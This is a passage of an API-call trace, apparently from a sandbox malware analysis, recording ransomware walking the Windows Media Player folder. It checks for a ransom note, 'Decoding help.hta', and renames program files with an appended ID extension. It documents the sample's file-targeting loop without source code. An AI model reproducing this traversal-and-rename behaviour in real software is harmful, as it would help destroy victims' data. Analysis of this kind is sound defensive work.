lstrcmpW (lpString1=".", lpString2="Network Sharing") returned -1 [0039.996] lstrcmpW (lpString1="..", lpString2="Network Sharing") returned -1 [0039.996] lstrcmpiW (lpString1="windows", lpString2="Network Sharing") returned 1 [0039.996] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0039.996] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0039.996] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Network Sharing" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Network Sharing") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Network Sharing" [0039.996] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Network Sharing", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Network Sharing\\*.*" [0039.996] GlobalMemoryStatus (in: lpBuffer=0xa64fd10 | out: lpBuffer=0xa64fd10) [0039.996] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93a02b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x224 [0040.004] CloseHandle (hObject=0x224) returned 1 [0040.004] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e72dbc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e72dbc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3e98f1d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1eb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup_wm.exe", cAlternateFileName="")) returned 1 [0040.004] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.004] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.004] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.004] lstrcmpiW (lpString1="Decoding help.hta", lpString2="setup_wm.exe") returned -1 [0040.004] lstrlenW (lpString="setup_wm.exe") returned 12 [0040.005] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.005] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.005] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="setup_wm.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe" [0040.005] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe" [0040.005] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0040.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe" (normalized: "c:\\program files (x86)\\windows media player\\setup_wm.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\setup_wm.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.010] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9b6c2483, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x9b6c2483, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Skins", cAlternateFileName="")) returned 1 [0040.010] lstrcmpW (lpString1=".", lpString2="Skins") returned -1 [0040.010] lstrcmpW (lpString1="..", lpString2="Skins") returned -1 [0040.010] lstrcmpiW (lpString1="windows", lpString2="Skins") returned 1 [0040.011] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.011] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.011] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Skins" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins" [0040.011] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Skins\\*.*" [0040.011] GlobalMemoryStatus (in: lpBuffer=0xa64fd10 | out: lpBuffer=0xa64fd10) [0040.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a84f30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x184 [0040.015] CloseHandle (hObject=0x184) returned 1 [0040.015] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visualizations", cAlternateFileName="VISUAL~1")) returned 1 [0040.015] lstrcmpW (lpString1=".", lpString2="Visualizations") returned -1 [0040.015] lstrcmpW (lpString1="..", lpString2="Visualizations") returned -1 [0040.015] lstrcmpiW (lpString1="windows", lpString2="Visualizations") returned 1 [0040.015] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.015] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.015] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Visualizations" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Visualizations") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Visualizations" [0040.015] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Visualizations", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Visualizations\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Visualizations\\*.*" [0040.015] GlobalMemoryStatus (in: lpBuffer=0xa64fd10 | out: lpBuffer=0xa64fd10) [0040.015] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94184c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x184 [0040.021] CloseHandle (hObject=0x184) returned 1 [0040.022] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3ee51dd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3ee51dd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3f0b33d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x37c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmlaunch.exe", cAlternateFileName="")) returned 1 [0040.022] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.022] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.022] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.022] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.022] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmlaunch.exe") returned -1 [0040.022] lstrlenW (lpString="wmlaunch.exe") returned 12 [0040.022] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.022] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.022] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="wmlaunch.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe" [0040.022] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe" [0040.022] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0040.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmlaunch.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmlaunch.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\wmlaunch.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.022] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3f0b33d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3f0b33d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3f0b33d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpconfig.exe", cAlternateFileName="")) returned 1 [0040.022] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.022] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.022] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.022] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.022] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpconfig.exe") returned -1 [0040.022] lstrlenW (lpString="wmpconfig.exe") returned 13 [0040.022] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.023] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="wmpconfig.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe" [0040.023] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe" [0040.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0040.023] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpconfig.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpconfig.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\wmpconfig.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.023] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb669e146, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb669e146, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb66c42a7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf0000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPDMC.exe", cAlternateFileName="")) returned 1 [0040.023] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.023] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.023] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.023] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPDMC.exe") returned -1 [0040.023] lstrlenW (lpString="WMPDMC.exe") returned 10 [0040.023] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.023] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="WMPDMC.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe" [0040.023] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe" [0040.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0040.023] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmc.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMC.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmc.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.023] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42b8907f, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x42b8907f, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xb19c3730, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMPDMCCore.dll", cAlternateFileName="")) returned 1 [0040.023] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.023] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.023] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.023] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.024] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WMPDMCCore.dll") returned -1 [0040.024] lstrlenW (lpString="WMPDMCCore.dll") returned 14 [0040.024] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.024] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="WMPDMCCore.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll" [0040.024] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll" [0040.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0040.024] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmccore.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\WMPDMCCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\wmpdmccore.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.024] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fdc01da, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x4fdc01da, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7a92dc30, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmpenc.exe", cAlternateFileName="")) returned 1 [0040.024] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.024] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.024] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.024] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmpenc.exe") returned -1 [0040.024] lstrlenW (lpString="wmpenc.exe") returned 10 [0040.024] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.024] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="wmpenc.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe" [0040.024] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe" [0040.024] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0040.024] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe" (normalized: "c:\\program files (x86)\\windows media player\\wmpenc.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\wmpenc.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\wmpenc.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0040.025] FindNextFileW (in: hFindFile=0x5a57f0, lpFindFileData=0xa64fd30 | out: lpFindFileData=0xa64fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3f3149e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3f3149e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3f3149e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x28400, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmplayer.exe", cAlternateFileName="")) returned 1 [0040.025] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.025] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned 51 [0040.025] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" [0040.025] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\decoding help.hta")) returned 0x1 [0040.025] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wmplayer.exe") returned -1 [0040.025] lstrlenW (lpString="wmplayer.exe") returned 12 [0040.025] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0040.025] 